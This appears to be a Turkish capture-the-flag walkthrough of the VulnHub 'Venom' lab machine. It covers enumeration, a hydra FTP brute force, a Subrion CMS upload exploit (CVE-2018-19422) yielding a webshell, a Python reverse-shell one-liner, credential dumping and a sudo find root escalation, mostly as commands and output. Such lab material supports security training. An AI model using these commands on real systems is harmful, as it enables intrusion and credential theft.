Makine Hakkında Bilgiler
Açıklama:
This machine was created for the OSCP Preparation.This box was created with virtualbox. For any queries please contact me on twitter: @avi0813. Enumeration is the Key.
Vulnhub Sayfası:
https://www.vulnhub.com/entry/venom-1,701/
İndirme Sayfası:
https://download.vulnhub.com/venom/venom.zip
Walkthrough
Makineyi tespit ederek başlayalım.
┌──(root💀kali)-[~]
└─# arp-scan -l | grep "Systemtechnik"
192.168.101.26 08:00:27:60:99:87 PCS Systemtechnik GmbH
┌──(root💀kali)-[~]
└─# ifconfig eth0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.101.24 netmask 255.255.255.0 broadcast 192.168.101.255
inet6 fe80::a00:27ff:fe8b:5efb prefixlen 64 scopeid 0x20<link>
ether 08:00:27:8b:5e:fb txqueuelen 1000 (Ethernet)
RX packets 114813 bytes 7942166 (7.5 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 45989 bytes 2803643 (2.6 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
nmap taraması ile devam edelim.
[*] Scan: 513
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-06 15:38 EDT
Nmap scan report for venom.box (192.168.101.26)
Host is up (0.00029s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Subrion CMS - Open Source Content Management System
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Home :: Powered by Subrion 4.2
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/https Apache/2.4.29 (Ubuntu)
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:60:99:87 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: Host: VENOM; OS: Unix
Host script results:
|_clock-skew: mean: -1h50m00s, deviation: 3h10m31s, median: -1s
|_nbstat: NetBIOS name: VENOM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: venom
| NetBIOS computer name: VENOM\x00
| Domain name: \x00
| FQDN: venom
|_ System time: 2021-07-07T01:09:07+05:30
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-07-06T19:39:07
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.29 ms venom.box (192.168.101.26)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.50 seconds
smb zerine enum4linux kullandım ve 2 tane kullanıcı yakaladım. Daha sonrasındaa bu kullanıcıllarla ftp ve smb için kabakuvvet saldırısı başlattım ancak bir sonuç alamadım. enum4linux'un gerekli çıktısı aşağıdadır.
[+] Getting domain group memberships:
=========================================================================
| Users on 192.168.101.26 via RID cycling (RIDS: 500-550,1000-1050) |
=========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-3525385883-4254613925-43684688
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\nathan (Local User)
S-1-22-1-1002 Unix User\hostinger (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
Nikto ve gobuster çıktılarında bir sonuç elde edemedim. Ancak default apache sayfasının kaynak kodlarında yoruma alınmış bir MD5 buldum. Bunu internette kırdım.
5f2a66f947fa5690c26506f66bde5c23:hostingerBelki bir şifre olabilir diye hydra'ya verdim ve ftp hesabını kırmayı başardım.
┌──(root💀kali)-[~/oscp/venom]
└─# hydra -L users -P hash ftp://192.168.101.26
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-06 13:09:33
[DATA] max 16 tasks per 1 server, overall 16 tasks, 30 login tries (l:5/p:6), ~2 tries per task
[DATA] attacking ftp://192.168.101.26:21/
[21][ftp] host: 192.168.101.26 login: hostinger password: hostinger
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-06 13:09:37
Bunun üzerine ftp ile bağlandım ve bir dosya buldum.
┌──(root💀kali)-[~/oscp/venom]
└─# ftp 192.168.101.26
Connected to 192.168.101.26.
220 (vsFTPd 3.0.3)
Name (192.168.101.26:kali): hostinger
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 1002 1002 4096 May 21 23:43 files
226 Directory send OK.
ftp> cd files
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 384 May 21 23:43 hint.txt
226 Directory send OK.
ftp> pwd
257 "/files" is the current directory
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 384 May 21 23:43 hint.txt
226 Directory send OK.
ftp> get hint.txt
local: hint.txt remote: hint.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for hint.txt (384 bytes).
226 Transfer complete.┌──(root💀kali)-[~/oscp/venom]
└─# cat hint.txt
Hey there...
T0D0 --
* You need to follow the 'hostinger' on WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= also aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=
* some knowledge of cipher is required to decode the dora password..
* try on venom.box
password -- L7f9l8@J#p%Ue+Q1234 -> deocode this you will get the administrator password
Have fun .. :)
WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= değerini 4 kere base64 decode ettikten sonra standard vigenere cipher ifadesi ile karşılaşıyoruz.
aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI= ifadesini bir kere base64 decode ettikten sonra https://cryptii.com/pipes/vigenere-cipher ifadesi ile karşılaşıyoruz. İlgili sayfaya gidip hostinger key'i ile decode işlemi gerekleştirdim. Elde ettiğim sonuç:E7r9t8@Q#h%Hy+M1234
Uzun incelemeler sonucu ilk başta bu parolayı hiç bir yerde kullanamadığımı anladım. Daha sonrasında nota geri döndüm try on venom.box, /etc/hosts'a ekledikten sonra bir CMS ile karşılaştım. Bu cms'e dora:E7r9t8@Q#h%Hy+M1234 kullanıcı bilgileri ile girebiliyoruz. İçeri girdikten sonra dora'nın şifresini test olarak güncellledim.
Elimde CMS'in version bilgisi vardı bunun üzerine searchsploit'de arama yaptım.
┌──(root💀kali)-[~/oscp/venom]
└─# searchsploit Subrion CMS 4.2.1
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Subrion CMS 4.2.1 - 'avatar[path]' XSS | php/webapps/49346.txt
Subrion CMS 4.2.1 - Cross-Site Scripting | php/webapps/45150.txt
Subrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated) | php/webapps/49876.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
┌──(root💀kali)-[~/oscp/venom]
└─# python3 49876.py -u http://venom.box/panel/ -l dora -p test
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://venom.box/panel/
[+] Success!
[+] Got CSRF token: I1fcCoH4sE8QxkwA27KKirM7IN6gfLiPiV3Y9bxh
[+] Trying to log in...
[+] Login Successful!
[+] Generating random name for Webshell...
[+] Generated webshell name: jabtmcowewjzpcu
[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://venom.box/panel/uploads/jabtmcowewjzpcu.phar
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
Kod okumak gerçekten önemli uzun bir süre url'nin sonuna slash koymadan exploiti çalıştırmayı denedim ancak kodları okuyunca kbunu kendimin koyması gerektiğini anladım. Artık içerdeyiz. Daha düzgün bir shell ortamı için kendime python ile reverse döndürdüm.
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.101.24",1822));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'hostinger kullanıcısının ftp hesabını kırmıştık. Bunun üzerine hostinger hesabına giriş yaptım. Çok işime yaramadı ancak mysql bilgilerini buyldum.
hostinger@venom:/var/www/html/subrion/includes$ cat config.inc.php
cat config.inc.php
<?php
/*
* Subrion Open Source CMS 4.2.1
* Config file generated on 20 May 2021 06:08:00
*/
define('INTELLI_CONNECT', 'mysqli');
define('INTELLI_DBHOST', 'localhost');
define('INTELLI_DBUSER', 'eddie');
define('INTELLI_DBPASS', 'v3n0mm0n3v');
define('INTELLI_DBNAME', 'subrion');
define('INTELLI_DBPORT', '3306');
define('INTELLI_DBPREFIX', 'sbr421_');
define('IA_SALT', '#5A7C224B51');
// debug mode: 0 - disabled, 1 - enabled
define('INTELLI_DEBUG', 0);
MariaDB [subrion]> select username, password, fullname from sbr421_members;
select username, password, fullname from sbr421_members;
+------------+--------------------------------------------------------------+---------------+
| username | password | fullname |
+------------+--------------------------------------------------------------+---------------+
| dora | $2y$10$OKmYFixqCDv75JOAcrkC2Oqq1wZLzg3R1s1GeD88FZlAI8rRz4TJK | Administrator |
| tester | $2y$10$l6KUEFw/OR9gSmuW3Cb.k.RhbwHPNXJzwfNHo/MUjHDJsPkspRPHC | testtester |
| Tester@123 | $2y$10$WUnG9ihuoCtBj8ZtTKIJd.t.CI6AKk1OMyCb/Yin9VwiC24E1gqIS | Testertest |
+------------+--------------------------------------------------------------+---------------+
Aramalar yaparken içeride nathan kullanıcısının parolasını buldum.
hostinger@venom:/var/www/html/subrion/backup$ ls
ls
total 12
drwxr-xr-x 2 www-data www-data 4096 May 21 16:53 .
drwxr-xr-x 13 www-data www-data 4096 May 21 23:42 ..
-rwxr-xr-x 1 www-data www-data 81 May 21 16:53 .htaccess
hostinger@venom:/var/www/html/subrion/backup$ cat .h
cat .htaccess
allow from all
You_will_be_happy_now :)
FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a
hostinger@venom:/var/www/html/subrion/backup$ su nathan
su nathan
Password: FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a
nathan@venom:/var/www/html/subrion/backup$ whoami
whoami
nathanSonrası son derece kolaydı.
nathan@venom:~$ sudo -l
sudo -l
[sudo] password for nathan: FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a
Matching Defaults entries for nathan on venom:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nathan may run the following commands on venom:
(root) ALL, !/bin/su
(root) ALL, !/bin/suSaçma bir güvenlik önlemi...
nathan@venom:~$ sudo find . -exec /bin/sh \; -quit
sudo find . -exec /bin/sh \; -quit
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
root.txt snap
# cat root.txt
cat root.txt
#root_flag
H@v3_a_n1c3_l1fe.
#
Basit makine.
İlk Yorumu Siz Yapın